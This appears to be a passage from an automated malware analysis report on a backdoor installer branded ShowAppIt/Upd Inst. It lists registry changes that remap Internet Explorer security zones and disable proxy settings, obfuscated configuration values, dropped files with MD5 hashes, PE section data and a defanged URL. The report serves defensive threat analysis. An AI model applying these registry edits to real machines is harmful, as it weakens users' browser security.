[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process usetup.exe:644 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 73 B7 2F 82 A2 56 68 B2 B2 BD 61 AA 12 7C 23"

The process rundll32.exe:1252 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 46 59 BE DF 2A 76 08 D8 45 38 B4 73 A5 52 96"

The process rundll32.exe:1972 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 7D 7D 02 53 A7 32 B0 CC 8F 75 87 9C FA E5 F3"

The process Upd Inst.exe:1788 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"493c7345" = ""

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"51d2f2ea" = "RPAj/YV/c/Ay/Xl/a//x/WV/cPAl/Y//alAf/YP/GPAf/B//VP/j/Cx/V/////%%"
"a1dcff5b" = "V/////%%"
"7f69fa1f" = "///%"
"340d3099" = "/P////%%"
"587b5709" = "V/////%%"
"a2e3b941" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c6c5dd44" = "V/////%%"
"2d71d5ab" = "V/////%%"
"8b9e4cbc" = "V/////%%"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"3c09c42b" = "///%"
"a0743acc" = "N/////%%"
"6185d035" = "VP/h/CP/V//l////"
"fe94ce1e" = "V/////%%"
"1520c6f1" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
"f0bf0bde" = "///%"
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"c99a5f5c" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"65114b36" = "Vl/l////"
"72758a5d" = "///%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0c230bcb" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 7D 7C F1 DC 99 75 53 D2 9D 37 5C 4F B8 93 1C"

[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c5705860" = "Vx////%%"
"d1abcdb6" = "///%"
"0e93c3f3" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"27ddcf6f" = "///%"
"414bc593" = "///%"
"0dc3ee96" = "/P////%%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
"bbf88800" = "///%"
"e46c271e" = "///%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
"7367429f" = "///%"

The process Upd Inst.exe:212 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"Publisher" = "PremiumSoft"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 t4SMY89/XZTo241UBcL1FgCdQgO" = "NP6yu5 jnxjzOdefABNqu"
"NP6yu5 rOHR67habcdI6oQitBZylEDlKv" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 obHhU6789/Xu3lMQKQBU9v0o8l1 pwHGQ7a" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 qwDMhUjlhabRi95gdx9wB Kt8h" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 q83XdcabcdeK18vAC0H9NVFErZY89qziqz" = "NP6yu5 xvTqlqdefABK 80Gq2mWBC1o0 "
"NP6yu5 jnTHsfABCDWtWkUM/W1aPBtS1 VQW3XAfac" = "NP6yu5 xztvqomjlha"
"NP6yu5 uGnmtBCDWYSqb6jM/jZxaHmJs4bb/qRin 8" = "NP6yu5 pdqftbmjlhaBLNCaCW6Gn/r7ZwKxxi3vVSHT8"
"NP6yu5 oFUvMDbcdefHBbxrMluGJ9Aygj" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 kMSXeBMOQIKhE69m1QE674UDEx" = "NP6yu5 z7vLgNfABCDER9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"InstallDate" = "20131002"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 xh2uW4Hwysu7Ssr8oWZx2xW2hDd4djxqbX" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 kq14RlhabcdIjFSyg16YzyLsH" = "NP6yu5 mKEMnTVNPRJuX1wT2IAlA/je9EmkVgWkIoJOav"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"DisplayName" = "Upd Inst"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 r 8G2h34567HEDrcOMl 7 u93c" = "NP6yu5 pdqftbmjlhaBLNCaCW6Gn/r7ZwKxxi3vVSHT8"
"NP6yu5 s/N9q2LFHwy5Ge3vWafDDyM0XgIXL/SocfUpBEc2iz" = "NP6yu5 xKYF 812345Z1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"_In" = "20141002"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 ow1rR56789/ue1sByvUf4kVuix" = "NP6yu5 p2g4ahLFHwykW"
"NP6yu5 t3BD56789/Xu4TF4qCfDCBTHm9BO81oA/UPCl" = "NP6yu5 jnxjzOdefABNqu"
"NP6yu5 yEFhrM xztvBTqybYrHCKZLQDEDd77yDa71" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 o/JAuurpnikZzc72iod641QVSkWTqJSu5zR" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 kzHwZuJLFHw5Fr3FSOzPpISE/F" = "NP6yu5 uDBxDY xztvCu97ygBqNrrfVrpnPvtSossp0Bhp2tIt/rYySGdnV6r1XFuQ6sBRm572bMSSvAZ/OONs HkRqlhE862xIPmTdR4dqHBbyHPF53QpX7hNgG4YVXljK2ZMMwne0CVWJWJbghTE3E7mzxRJP0H0FiN/tU2IgG4I8w/9DAh53ajKW7yPUaYBLn9LoeHW345F3UY8 IzVLMugTG/DxSeRtMbTuUrPQeqnHQsNpg3G8BK8ke5tx2WVKVlBNSNykrf9SDuE6O/CgdT/ruMVUKThe1KZHVzrmt5IL45JqB8oadba0 hF2cXHWiWrnaIKxRIj2YcPvJBcdhv3raZ6iDT 1xiQyw1lHDzIaglRjgVBMoFyvnEgCWVScvJ CSyEzx//pg8D4PZtfbhdLeBPOnG4K61iTKHc1VL0hfuNphvNMxZ9/v6fLTViZaJjq9BYEtgwXgs7udhVSg2Fu4IlcIQ7Pc23Hgo T9Udchl9xKtpeLf GAbD"
"NP6yu5 qCEj2JrpnikTXYRb/hjk8pv2i7" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 vGPjjAfABCDtsHMzvqSfT7E4si" = "NP6yu5 nsOVqgsurpn3luw"
"NP6yu5 zUPS3jlhabcQDMNIScd6AO3aDxmTq1WIaX6" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 iqFGhLqomjlSrvHfNHJ3oZIgyJwy44WgZ8t" = "NP6yu5 uDBxDY xztvCu97ygBqNrrfVrpnPvtSossp0Bhp2tIt/rYySGdnV6r1XFuQ6sBRm572bMSSvAZ/OONs HkRqlhE862xIPmTdR4dqHBbyHPF53QpX7hNgG4YVXljK2ZMMwne0CVWJWJbghTE3E7mzxRJP0H0FiN/tU2IgG4I8w/9DAh53ajKW7yPUaYBLn9LoeHW345F3UY8 IzVLMugTG/DxSeRtMbTuUrPQeqnHQsNpg3G8BK8ke5tx2WVKVlBNSNykrf9SDuE6O/CgdT/ruMVUKThe1KZHVzrmt5IL45JqB8oadba0 hF2cXHWiWrnaIKxRIj2YcPvJBcdhv3raZ6iDT 1xiQyw1lHDzIaglRjgVBMoFyvnEgCWVScvJ CSyEzx//pg8D4PZtfbhdLeBPOnG4K61iTKHc1VL0hfuNphvNMxZ9/v6fLTViZaJjq9BYEtgwXgs7udhVSg2Fu4IlcIQ7Pc23Hgo T9Udchl9xKtpeLf GAbD"
"NP6yu5 mPpwLQDWYSUoj8v7lBa0 8W0MSmWN4ClWM7" = "NP6yu5 zDwXQmsurpnBTUMLw3dXAL"
"NP6yu5 vbNHYCDWYSUoiK7bPU/LiTlOXXB/Y/8ZsgUeDPvDrC" = "NP6yu5 ouLGsR/XZTVHZg6"
"NP6yu5 jxu9x/ztvqoWwAvzzG1eDHhjPa" = "NP6yu5 zDwXQmsurpnBTUMLw3dXAL"
"NP6yu5 u4W7I3FHwysfpPWVEc640Vgj7vuI5FRvR" = "NP6yu5 xKYF 812345Z1"
"NP6yu5 qAAIJrpnikgVSUoLaz3mK8u RgKbxPY" = "NP6yu5 ms6Kogvqomje5FgkwM"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"URLUpdateInfo" = ""
"NoRepair" = "1"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 mGMVNpnikg0UES4we2P15TB9y" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 m493B1JLFHwfSLP0cq" = "NP6yu5 tdyrj012345Z3fgj6z0y7u"
"NP6yu5 q2cpRx789/XueIe5iLgmR36Hi9ZR5HNZs2A" = "NP6yu5 p2g4ahLFHwykW"
"NP6yu5 jyYwQburpniZRRB5FiXXl0Nh4RV" = "NP6yu5 iP8fsTVNPRJuy7aQTKp5265nc"
"NP6yu5 tJp3sbqomjlSvJfgkDPgofAaSAq8LeS0XEI" = "NP6yu5 nsOVqgsurpn3luw"
"NP6yu5 jJE/mnBCDWYvA42sczUv9SClfrqvZXt8sBARO" = "NP6yu5 iP8fsTVNPRJuy7aQTKp5265nc"
"NP6yu5 oxTCwROQIKEbfoQmXOVq3pyCV" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 qmagWavqomjYke3rg3RaIWgtRR6ly542b" = "NP6yu5 nwsFq/lhabcDtvbbBGU mzaBnM/ JOhFVCSVs1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"DisplayVersion" = "3.3.0.1634"
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 t p YmhabcdJfHSAepXR5o1j1c DKl8GWf2QPTqLd" = "NP6yu5 iJEHMZQIKEGoJNtaUn /KFIye81sQ"
"NP6yu5 oRN6utIKEG digPng1ySOBlAVHvZrTks5X3JZ0jUs" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 xGCT2oqomjlV2gRnCoLMWn7nyn" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 mGooxrikg01VravP7V/5b68FyY" = "NP6yu5 xztvqomjlha"
"NP6yu5 s2TbxEefABCxJ0DAXr /fsJdEdZsSHr HV" = "NP6yu5 mKEMnTVNPRJuX1wT2IAlA/je9EmkVgWkIoJOav"
"NP6yu5 xegqyZTVNPRhap40RL5nzk9RVF fIgeuX" = "NP6yu5 ouLGsR/XZTVHZg6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 06 1A B1 66 23 33 CD 88 68 BE F1 1F C5 6B 1D"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 iI0lv89/XZTpmaWCAW6XiF/xIowoplYxrEc" = "NP6yu5 z7vLgNfABCDER9"
"NP6yu5 upBrs456789yYTFdDrzVA0PJHl5GUN4cRRU6I0 /b" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 rK2YdOCDWYSo sSZJb0LFNMK7umzJ4f" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 pNrKTFbcdefEjL8Z1TlnENCpBpb" = "NP6yu5 tdyrj012345Z3fgj6z0y7u"
"NP6yu5 jO7cksRJLFHdItgO4" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 t5w/eBhabcdLg7/sFSAaTxRvG" = "NP6yu5 xvTqlqdefABK 80Gq2mWBC1o0 "
"NP6yu5 sH9 Y xztvq/XYWHIi jTIOMPd" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 sFynDebcdef tMD" = "NP6yu5 zbMgbIcdefAUN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"NoModify" = "1"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 u2C5SlhabcdKYXGD2X5Dtp " = "NP6yu5 nwsFq/lhabcDtvbbBGU mzaBnM/ JOhFVCSVs1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"SilentUninstall" = "c:\documents and settings\all users\application data\showappit\upd inst\upd inst.exe /uninstall"

[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 xyxzUr xztv8XRDd4dOlw/ 0eLrMM" = "NP6yu5 p/RcQikg012CPtvY0JqomLb"
"NP6yu5 qnt FxztvqoDfBtS/GCPHJVoOIo2SDnPtKi" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"UninstallString" = "c:\documents and settings\all users\application data\showappit\upd inst\upd inst.exe /uninstall"
"URLInfoAbout" = ""

The process %original file name%.exe:1936 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"EstimatedSize" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TsuE7C96BC7.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"QuietUninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{25D79~1\Setup.exe /remove /q"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EBF539D0-F45C-4138-9756-F390D12471F8}]
"388" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"Language" = "1033"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"TizPath" = "c:\%original file name%.exe"
"VersionMajor" = "1"
"TSAware" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Fonts" = "%WinDir%\Fonts"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 6A C7 8B 6F 5C 12 7B 83 5E 94 46 43 20 BA CC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"Version" = "16777216"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"VersionMinor" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"UninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{25D79~1\Setup.exe /remove /q0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons]
"usetup.exe" = "usetup"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
ce1318bd22fa94be9467011b74bb1a7f c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll
e717f6ce3a7429bfa6d7f3cf66737a4b c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe
af7ce801c8471c5cd19b366333c153c4 c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\TsuDll.dll
c2e76423f552080552e5da890254a610 c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll
deba33db167548f8bbac30f5d78eb168 c:\Documents and Settings\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe
23912df27a61ea0463c5509ba6a97579 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe
deba33db167548f8bbac30f5d78eb168 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe
d4d1cc69e363813c14f289694756aa1e c:\Program Files\Assistant.dll
12f36f36188cbd24a4d601ccc9ef5e76 c:\Program Files\AssistantSvc.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ShowAppIt
Product Name: ShowAppIt
Product Version: 1.0.0.3
Legal Copyright: Copyright (c) 2014 ShowAppIt
Legal Trademarks:
Original Filename: TSULoader.exe
Internal Name: TSULoader
File Version: 2014.9.14.1647
File Description: Installer for ShowAppIt
Comments: WinNT (x86) Unicode Lib Rel
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 7672 7680 4.5056 b1ae6dcdc3a7ba319c6d5e0b1a2eadbc
.rdata 12288 1794 2048 3.26018 cd4f20f041a2da05dfe5974fe61bd4ec
.data 16384 1040 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 20480 8288 8704 2.76251 842c41f3c116b14a898c99f76d414d8f
.reloc 32768 348 512 2.09579 938152484b33bca77bd622973abb524e
.tsustub 36864 120967 121344 5.54288 6bff97e7c4ba19b490b1f74f8560d6bb
.tsuarch 159744 175616 175616 5.54447 db78c3c938591436ec644f5f60a0165a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 118
74e5ffa3b73f3ffe23841870340c5249
99aacc7fe4e3bc25f6d87a5c15ad6bc4
cc0d7947ba66f68266f5e9008a42a6f1
d668943e105742b1861ef8beaa329376
2c644688a5095d89445a26221cafd32d
26d79d3147c13a53a3b5cb1ee10f511f
4ee92b21f432a031f01dad629305ecab
1dbff8d6aa238ba053263e45e7b7c460
fdd3b5b1981b8e90105117061106afc3
8868c99f19b5e96e19e7e8f8e691a487
8e56f84263e44b2ac878bf49e69ffbb2
15c7d0a6048b63c48b20ef56b565e2ea
547395157e353df329b0db94ecf76ad1
04eb40fb002c14eb1dc6476e971e1c1b
2d770687d420395789c72fd6246f82da
b697b520cd1ecc186ccae823c92f8876
ff33cd0ac8a80ab1cac0fdd243bd5f2b
a0a1c71ac9a872f46e06d1d5aa700f8e
e66c7d74dea538d2f8ff84a75861c01d
ee7c3cf4b35ffd0a7323e6d76695a705
e16934c602e77233eca0d0974bc32b21
6d8cecff8d7ed822d940dbad5b59c0ea
6b1482f282b565ab814a1f5e3c095830
67a207a3c4a7c54e9ec18b18ebcba70b
5d94e6afee6c604582dcccc8ca2766d8
96e5b8b30c2410b2e339bdd71916466d

URLs

URL IP
hxxp://loversion.com/?report_version=5&
